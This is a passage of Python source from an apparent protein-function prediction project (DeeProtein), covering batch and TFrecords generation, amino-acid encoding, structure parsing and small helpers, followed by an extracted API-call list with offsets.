padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq = np.transpose(padded_seq_matrix)
if return_name:
# return a sequence ID to identify the generated sequence
# generate a "random" name
name = 'g%d' % self.garbage_count
return name, padded_seq, label, garbage_label
else:
return padded_seq, label, garbage_label
def generate_random_data_batch(self):
"""Generates a batch consisting solely of random data.
Generate a batch full of random data drawn form a normal distribution.
Returns:
seq_tensor_batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the random data batch.
onehot_labelled_batch: A `Tensor`, [batchsize, n_classes] holding the random labels.
"""
seq_tensor_batch = tf.random_normal([self._opts._batchsize, self._opts._embeddingdim,
self._opts._windowlength, 1])
label_batch = [np.random.randint(1,self._opts._nclasses) for _ in range(self._opts._batchsize)]
index_batch = [tf.constant(label) for label in label_batch]
label_tensor = tf.stack(index_batch)
onehot_labelled_batch = tf.one_hot(indices=tf.cast(label_tensor, tf.int32),
depth=self._opts._nclasses)
return seq_tensor_batch, onehot_labelled_batch
def generate_batch(self, is_train):
"""Generate a batch for the feed_dict pipeline.
This function is depracted. Please use the input pipeline along with the TFrecordsgenrator
training sequence input.
Args:
is_train: A `bool` from which dataset (train/valid) to draw the samples.
Returns:
batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the inference data batch.
label_batch: A `Tensor`, [batchsize, n_classes] holding the labels.
positions: A `Tensor` [batchsize, start, end], where the start/end position of a sequence is.
"""
seq_tensors = []
label_batch = []
positions = np.ndarray([self._opts._batchsize, 2])
lengths = np.ndarray([self._opts._batchsize])
if is_train:
in_csv = self.traindata
else:
in_csv = self.validdata
for i in range(self._opts._batchsize):
try:
""" Note that this is not shuffled! """
ECclass, seq_tensor, start_pos, end_pos = self._process_csv(in_csv, return_name=False,
encode_labels=True)
label_batch.append(ECclass)
seq_tensors.append(seq_tensor)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
if is_train:
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
else:
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
""" redo """
ECclass, seq_tensor, start_pos, end_pos = self._process_csv(in_csv, return_name=False,
encode_labels=True)
label_batch.append(ECclass)
seq_tensors.append(seq_tensor)
positions[i, 0] = start_pos
positions[i, 1] = end_pos
lengths[i] = end_pos
batch = np.stack(seq_tensors, axis=0)
return batch, label_batch, positions
def generate_binary_batch(self):
"""Generate a binary batch for training protein activity.
This function requires a special input dataset, where the labels are already encoded as their target float.
Thus this function does NOT use the GO-file nor the examples dumps.
Labels should be encoded from 0 (no activity) over 0.5 (first active bin) to 1. (maximum activity).
Returns:
batch: A np.ndarray holding the batch
labels: A np.ndarray holding the labels
"""
seq_tensors = []
labels = []
in_csv = self.traindata
for i in range(self._opts._batchsize):
try:
""" Note that this is not shuffled! """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
seq_tensors.append(seq_tensor)
labels.append(label)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
""" redo """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
seq_tensors.append(seq_tensor)
labels.append(label)
# encode the labels "one-hot" although not really one hot, but rather with the passed score
labels_tensor = []
for i in labels:
labels_tensor = [np.float32(l) for l in labels]
del labels
labels = np.stack(labels_tensor, axis=0) # [b, 1]
#print(labels.shape)
batch = np.stack(seq_tensors, axis=0)
batch = np.expand_dims(batch, axis=-1) # [b, aa, w, 1]
return batch, labels
def generate_valid_batch(self, include_garbage=False):
"""Generate a batch of sequences form the valid set for inference.
Draws samples from the valid set and generates a batch to infer the labels. As everything is fed into
the same graph, we use the same kind of preprocessing as in generate_batch().
This function is also used in the DeeProtein.generate_embedding().
Args:
include_garbage: A `bool`, if True, include garbage sequences into the valid batch (optional).
Defaults to False
Returns:
batch: A `Tensor`, [batchsize, 20, windowlength, 1] holding the sequences batch.
"""
seq_tensors = []
in_csv = self.validdata
if not include_garbage:
for i in range(self._opts._batchsize):
try:
""" Note that this is not shuffled! """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
""" redo """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
#
elif include_garbage:
num_garbage = math.ceil(self._opts._batchsize * self.garbage_percentage)
for i in range(self._opts._batchsize - num_garbage):
try:
""" Note that this is not shuffled! """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
except IndexError: # catches error from csv_decoder
# reopen the file:
in_csv.close()
# TODO: implement file shuffling when we reopen the file
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
""" redo """
name, label, seq_tensor, _, _ = self._process_csv(in_csv, return_name=True,
encode_labels=False)
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
for i in range(num_garbage):
name, seq_tensor, _, _ = self.generate_garbage_sequence(return_name=True)
label = 'garbage'
self._update_embedding_dict(name, label)
seq_tensors.append(seq_tensor)
batch = np.stack(seq_tensors, axis=0)
batch = np.expand_dims(batch, axis=-1)
return batch
class TFrecords_generator():
"""TFrecords_generator of the DeeProtein model.
This class takes a splitted dataset (train, valid) and generates examples files as tf.Records files. This
file format is required to train the model from the DeeProtein inputpipeline.
Attributes:
_opts: A `helpers.OptionHandler` holding the global options for the module.
label_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the labels.
AA_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the AA letters.
mode: A `str`. Has to be one of ['one_hot_padded']
traindata: A `fileObject` the file from which to train.
validdata: A `fileObject` the file from which to evaluate.
AA_to_id: A `dict` mapping single letter AAs to integers.
class_dict: An `OrderedDict` mapping `str` labels to integers. The order is kept from the EC_file specifier in
the config_dict.
structure_dict: An `dict` mapping the structural information to an int.
examples_per_file: A `int32`, defines the nr of sampels that is included in a tf.Records file.
epochs: A `int32` defining the nr of epochs to train.
curr_epoch: A `int32` counter for the epcohs.
writer: A `fileObj` in which to write the log messages.
"""
def __init__(self, optionhandler):
self._opts = optionhandler
self.label_enc = OneHotEncoder(n_values=self._opts._nclasses, sparse=False)
self.AA_enc = 'where we put the encoder for the AAs'
self.mode = self._opts._batchgenmode # one of ['window', 'bigbox', 'dynamic']
self.traindata = open(self._opts._traindata, 'r')
self.validdata = open(self._opts._validdata, 'r')
self.AA_to_id = {}
self.class_dict = {}
self._get_class_dict()
self.structure_dict = {}
self.examples_per_file = 10000
self.epochs = self._opts._numepochs
self.curr_epoch = 0
self.writer = 'where we put the writer'
# get the structure_dict
structure_forms = ['UNORDERED', 'HELIX', 'STRAND', 'TURN']
assert len(structure_forms) == self._opts._structuredims-1
for s in structure_forms:
self.structure_dict[s] = len(self.structure_dict) + 1 #serve the 0 for NO INFORMATION
if self.mode.startswith('one_hot'):
AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',
'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y',]
#'X']
self.AA_enc = OneHotEncoder(n_values=self._opts._depth, sparse=False)
if 'physchem' in self.mode:
_hydro = [1.8, 2.5, -3.5, -3.5, 2.8,
-0.4, -3.2, 4.5, -3.9, 3.8,
1.9, -3.5, -1.6, -3.5, -4.5,
-0.8, -0.7, 4.2, -0.9, -1.3]
_molarweight = [89.094, 121.154, 133.104, 147.131, 165.192,
75.067, 155.156, 131.175, 146.189, 131.175,
149.208, 132.119, 115.132, 146.146, 174.203,
105.093, 119.119, 117.148, 204.228, 181.191]
_is_polar = lambda aa: 1 if aa in ['DEHKNQRSTY'] else 0
_is_aromatic = lambda aa: 1 if aa in ['FWY'] else 0
_has_hydroxyl = lambda aa: 1 if aa in ['ST'] else 0 #should we add TYR??
_has_sulfur = lambda aa: 1 if aa in ['CM'] else 0
for i, aa in enumerate(AAs):
self.AA_to_id[aa] = {'id': len(self.AA_to_id),
'hydro': _hydro[i],
'molweight': _molarweight[i],
'pol': _is_polar(aa),
'arom': _is_aromatic(aa),
'sulf': _has_sulfur(aa),
'OH': _has_hydroxyl(aa)}
else:
for aa in AAs:
self.AA_to_id[aa] = len(self.AA_to_id)
# get the inverse:
self.id_to_AA = {}
for aa, id in self.AA_to_id.items():
self.id_to_AA[id] = aa
self.id_to_AA[42] = '_'
def _get_class_dict(self):
"""
This function generates the class-dict. The class dict stores the link between the index in the one-hot
encoding and the class.
"""
with open(self._opts._ecfile, "r") as ec_fobj:
for line in ec_fobj:
fields = line.strip().split()
if fields[1].endswith('.csv'): #TODO delete this when error is fixed
fields[1] = fields[1].rstrip('.csv')
if self._opts._labels == 'EC':
self.class_dict[fields[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
if self._opts._labels == 'GO':
self.class_dict[fields[1].split('_')[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
def _csv_EC_decoder(self, in_csv):
"""Helper function for _process_csv().
This function takes an in csv obj and iterates over the lines.
Args:
in_csv: `fileobject`, the incsv file object.
encoded_labels: `bool`, wheter to return one-hot encoded labels or the label as string (optional).
Defaults to True.
Returns:
name: A `str` holding the name of the sample sequence.
seq: A `str` holding the sequence.
seq: A `str` holding the label(s).
"""
line = in_csv.readline()
fields = line.strip().split(';')
name = fields[0]
seq = fields[1]
if self._opts._labels == 'EC':
if fields[3].endswith('.csv'):
fields[3] = fields[3].rstrip('.csv')
EC_str = fields[3]
EC_CLASS = 0 if self._opts._inferencemode else self.class_dict[EC_str]['id']
label = [[EC_CLASS]] # we need a 2D array
elif self._opts._labels == 'GO':
GO_str = fields[2]
GOs = 0 if self._opts._inferencemode else fields[2].split(',')
if GOs[0].endswith('.csv'):
GOs = [go.rstrip('.csv') for go in GOs]
label = [[self.class_dict[go]['id']] for go in GOs] # returns a 2D array
# TODO add an assertion for mode
structure_str = fields[3]
return name, seq, label, structure_str
def _seq2tensor(self, seq):
"""Helper function for _process_csv().
Takes a sequence and encodes it onehot.
Args:
seq: `str`, The sequence to encode
Returns:
padded_seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos.
length: A `Tensor` holding the length.
"""
if self.mode == 'one_hot_padded':
# first check if the sequence fits in the box:
if len(seq) <= self._opts._windowlength:
seq_matrix = np.ndarray(shape=(len(seq)), dtype=np.int32)
# if sequence does not fit we clip it:
else:
seq_matrix = np.ndarray(shape=(self._opts._windowlength), dtype=np.int32)
for i in range(len(seq_matrix)):
seq_matrix[i] = self.AA_to_id[seq[i]]
start_pos = 0 #because our sequence sits at the beginning of the box
length = len(seq_matrix) #true length (1 based)
# now encode the sequence in one-hot
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq_matrix,
(1, -1))), (len(seq_matrix), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq_matrix = np.transpose(padded_seq_matrix)
del oh_seq_matrix, seq_matrix
return padded_seq_matrix, start_pos, length #true length 1 based
else:
print("Error: MODE must be of 'one_hot_padded'")
def _get_structure(self, structure_str, seq_length):
"""Encodes the 2ndary strucure of a sequence.
Construct a One Hot Encoded Tensor with height = self._structure_dims, width = self._windowlength
Args:
structure_str: A `str` object holding the structural information for a sequence.
The entry in the dataset.csv corresponds to the FT fields in the swissprot textfile download.
Example format:
[('TURN', '11', '14'), ('HELIX', '19', '27'), ('STRAND', '32', '36'), ('HELIX', '45', '54'),
('STRAND', '59', '69'), ('STRAND', '72', '80'), ('HELIX', '86', '96'), ('HELIX', '99', '112'),
('HELIX', '118', '123'), ('HELIX', '129', '131'), ('HELIX', '134', '143'), ('STRAND', '146', '149'),
('HELIX', '150', '156'), ('STRAND', '157', '159'), ('HELIX', '173', '182'), ('STRAND', '186', '189'),
('HELIX', '192', '194'), ('HELIX', '199', '211'), ('STRAND', '216', '221'), ('HELIX', '226', '239'),
('STRAND', '242', '246'), ('HELIX', '272', '275'), ('HELIX', '277', '279'), ('STRAND', '283', '285')]
Returns:
padded_structure_matrix: A `Tensor`, of shape [structure_dims, windowlength] holding the structure info.
"""
# if there is info about the structure:
if structure_str != '[]':
# get an array of len length:
structure = np.ones([seq_length])
# modify the structure str:
# TODO: Improve the super ugly hack with a proper regex
structure_str = re.sub('[\'\[\]\(]', '', structure_str)
structure_features = [j.strip(', ').split(', ') for j in structure_str.strip(')').split(')')]
for ft in structure_features:
# get the ID for the ft:
id_to_write = self.structure_dict[ft[0]]
start = int(ft[1])
end = int(ft[2])
for i in range(start, end+1):
structure[i] = id_to_write
npad = ((0, self._opts._windowlength-seq_length))
padded_structure_matrix = np.pad(structure, pad_width=npad, mode='constant', constant_values=0)
else:
# return only zeros if there is no information about the structure
padded_structure_matrix = np.zeros([self._opts._windowlength])
return padded_structure_matrix
def _process_csv(self, queue):
"""Iterate over a dataset.csv and process the samples.
Takes the path to a file and processes the samples a sample at a time whenever the function is called.
Args:
queue: `str` the file_path to the dataset.csv. The csv file should be in the form of:
name,seq,labels.
return_name: `bool` whether to return the sequence name or not. Defaults to True.
encode_labels: `bool` whether to return the encoded labels or the raw str. Defaults to True.
Returns:
Depending on return_name either (if true):
name: A `str` holding the sample name.
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
OR
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
"""
_, seq, labels, structure_str = self._csv_EC_decoder(queue)
seq_matrix, start_pos, length = self._seq2tensor(seq)
try:
structure_tensor = self._get_structure(structure_str, length)
except KeyError:
structure_tensor = 'no_stucture_defined'
# encode the label one_hot:
oh_label_tensor = self.label_enc.fit_transform(labels) # of shape [1, n_classes]
classes = oh_label_tensor.shape[0]
# open an array full of zeros to add the labels to
oh_labels = np.zeros(self._opts._nclasses)
for c in range(classes):
oh_labels += oh_label_tensor[c]
oh_labels = np.expand_dims(oh_labels, axis=0)
return oh_labels, seq_matrix, structure_tensor, start_pos, length
def generate_garbage_sequence(self):
"""Generate a garbage sequence.
Generates a sequence full of garbage, e.g. a obviously non functional sequence. Used to test the robustness of
the model precision.
Args:
return_name: A `bool`, if True return the garbage sequene along wih a generated name.
Returns:
name: A `str` holding the sample name (if return_name is True).
padded_seq: A `Tensor` holding the one-hot encoded and padded (to windowlength) garbage sequence.
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
The labels of a garbage sequence are a zeros Tensor.
garbage_label: A `Tensor` holding the garbage label (binary, either 1 for garbage or 0 for valid sequence).
"""
modes = ['complete_random', 'pattern', 'same']
mode = modes[random.randint(0, 2)]
# get the length of the protein
length = random.randint(175, self._opts._windowlength-1)
if mode == 'pattern':
#print('pattern')
# Generate a repetitive pattern of 5 AminoAcids to generate the prot
# get a random nr of AAs to generate the pattern:
AA_nr = random.randint(2, 5)
# get an index for each AA in AA_nr
idxs = []
for aa in range(AA_nr):
idx_found = False
while not idx_found:
aa_idx = random.randint(0, 19)
if not aa_idx in idxs:
idxs.append(aa_idx)
idx_found = True
reps = math.ceil(length/AA_nr)
seq = reps * idxs
length = len(seq)
elif mode == 'complete_random':
# print('complete_random')
seq = []
for aa in range(length):
# get an idx for every pos in length:
idx = random.randint(0, 19)
seq.append(idx)
elif mode == 'same':
# print('ONE')
AA = random.randint(0, 19)
seq = length * [AA]
label = np.zeros([self._opts._nclasses])
label = np.expand_dims(label, axis=0)
garbage_label = np.asarray([1])
garbage_label = np.expand_dims(garbage_label, axis=0)
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq, (1, -1))), (len(seq), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq = np.transpose(padded_seq_matrix)
return padded_seq, label, garbage_label
def _bytes_feature(self, value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_feature(self, value):
return tf.train.Feature(bytes_list=tf.train.FloatList(value=[value]))
def _int64_feature(self, value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def example_to_TFrecords(self, is_train, garbage_percentage=0.2, structure=True):
"""Convert a dataset.csv into tf.Records format.
This function reads the dataset files specified in the config dict and generates examples files in
tf.Records format in the batches_dir folder specified in the config dict
Args:
is_train: A `bool` defining which dataset file to use (true: train, false: valid).
garbage_percentage: A `float` defining the percentage of garbage to add to the tf.records files.
structure: A `bool` whether to include structural information in the records or not.
"""
include_garbage = False if garbage_percentage == 0 else True
# determine how many files we need to write:
if is_train:
length_data_set = _count_lines(self._opts._traindata)
batch_files_name = os.path.basename(self._opts._traindata) + \
'train_batch_{}'.format(str(self._opts._windowlength))
print(batch_files_name)
in_csv = self.traindata
else:
length_data_set = _count_lines(self._opts._validdata)
batch_files_name = os.path.basename(self._opts._validdata) + \
'valid_batch_{}'.format(str(self._opts._windowlength))
print(batch_files_name)
in_csv = self.validdata
files_to_write = np.int32(np.ceil(length_data_set*(1+garbage_percentage)
/ float(self.examples_per_file))) # write every thing twice
for n in range(1, files_to_write+1):
file_path = os.path.join(self._opts._batchesdir, batch_files_name) + '_' + str(n)
self.writer = tf.python_io.TFRecordWriter(file_path)
if structure:
for i in range(self.examples_per_file):
if include_garbage and i % int(1/garbage_percentage) == 0:
# print("garbage_seq")
seq_tensor, label, garbage_label = self.generate_garbage_sequence()
structure_label = np.zeros([self._opts._windowlength])
assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength), \
"%s" % str(seq_tensor.shape)
assert label.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = label.tostring()
garbage_label_raw = garbage_label.tostring()
structure_label_raw = structure_label.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'structure_depth': self._int64_feature(self._opts._structuredims),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
'garbage_label_raw': self._bytes_feature(garbage_label_raw),
'structure_label_raw': self._bytes_feature(structure_label_raw),
}))
self.writer.write(example.SerializeToString())
else:
# print("validseq")
try:
oh_labels, seq_tensor, structure_label, _, _ = self._process_csv(in_csv)
except IndexError: # catches error from csv_decoder -> reopen the file:
in_csv.close()
if is_train:
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
else:
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
oh_labels, seq_tensor, structure_label, _, _ = self._process_csv(in_csv)
garbage_label = np.asarray([0]) # NOT garbage
garbage_label = np.expand_dims(garbage_label, axis=0)
assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength)
assert oh_labels.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = oh_labels.tostring()
garbage_label_raw = garbage_label.tostring()
structure_label_raw = structure_label.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'structure_depth': self._int64_feature(self._opts._structuredims),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
'garbage_label_raw': self._bytes_feature(garbage_label_raw),
'structure_label_raw': self._bytes_feature(structure_label_raw),
}))
self.writer.write(example.SerializeToString())
elif not structure:
for i in range(self.examples_per_file):
if include_garbage and i % int(1/garbage_percentage) == 0:
# print("garbage_seq")
assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength),\
"%s" % str(seq_tensor.shape)
assert label.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = label.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
}))
self.writer.write(example.SerializeToString())
else:
# print("validseq")
try:
oh_labels, seq_tensor, _, _, _ = self._process_csv(in_csv)
except IndexError: # catches error from csv_decoder -> reopen the file:
in_csv.close()
if is_train:
self.traindata = open(self._opts._traindata, 'r')
in_csv = self.traindata
else:
self.validdata = open(self._opts._validdata, 'r')
in_csv = self.validdata
oh_labels, seq_tensor, _, _, _ = self._process_csv(in_csv)
assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength)
assert oh_labels.shape == (1, self._opts._nclasses)
# convert the features to a raw string:
seq_raw = seq_tensor.tostring()
label_raw = oh_labels.tostring()
example = tf.train.Example(
features=tf.train.Features(feature={
'windowlength': self._int64_feature(self._opts._windowlength),
'depth': self._int64_feature(self._opts._depth),
'label_classes': self._int64_feature(self._opts._nclasses),
'seq_raw': self._bytes_feature(seq_raw),
'label_raw': self._bytes_feature(label_raw),
}))
self.writer.write(example.SerializeToString())
self.writer.close()
def produce_train_valid(self):
"""Highlevel wrapper for the example_to_TF_records function."""
assert self.mode.startswith('one_hot'), "mode must be 'one_hot_padded'"
self.example_to_TFrecords(is_train=True, garbage_percentage=0, structure=False)
self.example_to_TFrecords(is_train=False, garbage_percentage=0, structure=False)
def plot_histogram(log_file, save_dir):
"""Simple plotting function to plot a hist from a specified file containing counts per labels.
Args:
log_file: A `str` to the file containing the histogram data.
"""
count_dict = {}
with open(log_file, "r") as in_fobj:
for line in in_fobj:
pred_labels = line.strip().split()
for label in pred_labels:
try:
count_dict[label] += 1
except KeyError:
count_dict[label] = 0
bars = [count_dict[label] for label in count_dict.keys()]
labels = [label for label in count_dict.keys()]
set_style("whitegrid")
fig, ax = plt.subplots()
ax = barplot(x=bars, y=labels)
fig.save(os.path.join(save_dir, 'negative_test.png'))
def _add_var_summary(var, name, collection=None):
"""Attaches a lot of summaries to a given tensor.
Args:
var: A `Tensor`, for which to calculate the summaries.
name: `str`, the name of the Tensor.
collection: `str` the collection to which to add the summary. Defaults to None.
"""
with tf.name_scope(name):
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean, collections=collection)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev, collections=collection)
tf.summary.scalar('max', tf.reduce_max(var), collections=collection)
tf.summary.scalar('min', tf.reduce_min(var), collections=collection)
tf.summary.histogram('histogram', var, collections=collection)
def _variable_on_cpu(name, shape, initializer, trainable):
"""Helper function to get a variable stored on cpu.
Args:
name: A `str` holding the name of the variable.
shape: An `Array` defining the shape of the Variable. For example: [2,1,3].
initializer: The `tf.Initializer` to use to initialize the variable.
trainable: A `bool` stating wheter the variable is trainable or not.
Returns:
A `tf.Variable` on CPU.
"""
with tf.device('/cpu:0'): #TODO will this work?
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype, trainable=trainable)
#dtf.add_to_collection('CPU', var)
return var
def softmax(X, theta = 1.0, axis = None):
"""Compute the softmax of each element along an axis of X.
Args:
X: `ND-Array`, Probably should be floats.
theta: float parameter, used as a multiplier
prior to exponentiation. Default = 1.0 (optional).
axis: axis to compute values along. Default is the
first non-singleton axis (optional).
Returns:
An `Array` of same shape as X. The result will sum to 1 along the specified axis.
"""
# make X at least 2d
y = np.atleast_2d(X)
# find axis
if axis is None:
axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1)
# multiply y against the theta parameter,
y = y * float(theta)
# subtract the max for numerical stability
y = y - np.expand_dims(np.max(y, axis = axis), axis)
# exponentiate y
y = np.exp(y)
# take the sum along the specified axis
ax_sum = np.expand_dims(np.sum(y, axis = axis), axis)
# finally: divide elementwise
p = y / ax_sum
# flatten if X was 1D
if len(X.shape) == 1: p = p.flatten()
return p
def untar(file):
"""Untar a file in the current wd.
Args:
file: A str specifying the filepath
"""
try:
tar = tarfile.open(fname)
tar.extractall()
tar.close()
except:
print('ERROR: File is not a .tar.gz, or does not exist.')
| [
"tarfile.open",
"tensorflow.get_variable",
"matplotlib.pyplot.ylabel",
"tensorflow.train.Int64List",
"seaborn.set_style",
"tensorflow.reduce_mean",
"tensorflow.cast",
"numpy.atleast_2d",
"numpy.greater",
"numpy.mean",
"tensorflow.random_normal",
"os.path.exists",
"numpy.multiply",
"numpy.reshape",
"tensorflow.reduce_min",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.asarray",
"numpy.max",
"numpy.exp",
"matplotlib.pyplot.close",
"numpy.stack",
"os.mkdir",
"numpy.concatenate",
"tensorflow.python_io.TFRecordWriter",
"tensorflow.train.FloatList",
"matplotlib.pyplot.ylim",
"numpy.maximum",
"tensorflow.summary.scalar",
"tensorflow.square",
"random.randint",
"tensorflow.stack",
"tensorflow.device",
"collections.OrderedDict",
"matplotlib.pyplot.savefig",
"numpy.amin",
"numpy.ones",
"numpy.float32",
"matplotlib.use",
"matplotlib.pyplot.ioff",
"tensorflow.train.BytesList",
"tensorflow.reduce_max",
"tensorflow.summary.histogram",
"matplotlib.pyplot.title",
"matplotlib.pyplot.xlim",
"numpy.transpose",
"re.sub",
"matplotlib.pyplot.legend",
"math.ceil",
"os.makedirs",
"sklearn.preprocessing.OneHotEncoder",
"matplotlib.font_manager.FontProperties",
"os.path.join",
"numpy.sum",
"numpy.zeros",
"matplotlib.pyplot.figure",
"numpy.pad",
"numpy.ndarray",
"numpy.expand_dims",
"tensorflow.name_scope",
"numpy.random.randint",
"tensorflow.constant",
"seaborn.barplot",
"os.path.basename",
"numpy.amax",
"matplotlib.pyplot.subplots",
"json.dump"
] | [((18, 39), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (32, 39), False, 'import matplotlib\n'), ((67773, 67795), 'seaborn.set_style', 'set_style', (['"""whitegrid"""'], {}), "('whitegrid')\n", (67782, 67795), False, 'from seaborn import barplot, set_style\n'), ((67810, 67824), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (67822, 67824), True, 'import matplotlib.pyplot as plt\n'), ((67834, 67859), 'seaborn.barplot', 'barplot', ([], {'x': 'bars', 'y': 'labels'}), '(x=bars, y=labels)\n', (67841, 67859), False, 'from seaborn import barplot, set_style\n'), ((70053, 70069), 'numpy.atleast_2d', 'np.atleast_2d', (['X'], {}), '(X)\n', (70066, 70069), True, 'import numpy as np\n'), ((70377, 70386), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (70383, 70386), True, 'import numpy as np\n'), ((7012, 7061), 'os.path.join', 'os.path.join', (['self._opts._summariesdir', '"""metrics"""'], {}), "(self._opts._summariesdir, 'metrics')\n", (7024, 7061), False, 'import re, os\n'), ((7329, 7359), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7337, 7359), True, 'import numpy as np\n'), ((7396, 7426), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7404, 7426), True, 'import numpy as np\n'), ((7460, 7490), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7468, 7490), True, 'import numpy as np\n'), ((8559, 8590), 'numpy.greater', 'np.greater', (['sigmoid_logits', '(0.5)'], {}), '(sigmoid_logits, 0.5)\n', (8569, 8590), True, 'import numpy as np\n'), ((8688, 8726), 'numpy.sum', 'np.sum', (['batch_predicted_labels'], {'axis': '(0)'}), '(batch_predicted_labels, axis=0)\n', (8694, 8726), True, 'import numpy as np\n'), ((8801, 8828), 'numpy.sum', 'np.sum', (['true_labels'], {'axis': '(0)'}), '(true_labels, axis=0)\n', (8807, 8828), True, 'import numpy as np\n'), ((10045, 10083), 'numpy.concatenate', 'np.concatenate', (['self.roc_score'], {'axis': '(0)'}), '(self.roc_score, axis=0)\n', (10059, 10083), True, 'import numpy as np\n'), ((10110, 10149), 'numpy.concatenate', 'np.concatenate', (['self.roc_labels'], {'axis': '(0)'}), '(self.roc_labels, axis=0)\n', (10124, 10149), True, 'import numpy as np\n'), ((10950, 10973), 'numpy.mean', 'np.mean', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (10957, 10973), True, 'import numpy as np\n'), ((11055, 11078), 'numpy.amax', 'np.amax', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (11062, 11078), True, 'import numpy as np\n'), ((11159, 11182), 'numpy.amin', 'np.amin', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (11166, 11182), True, 'import numpy as np\n'), ((13273, 13303), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (13281, 13303), True, 'import numpy as np\n'), ((13340, 13370), 'numpy.zeros', 'np.zeros', 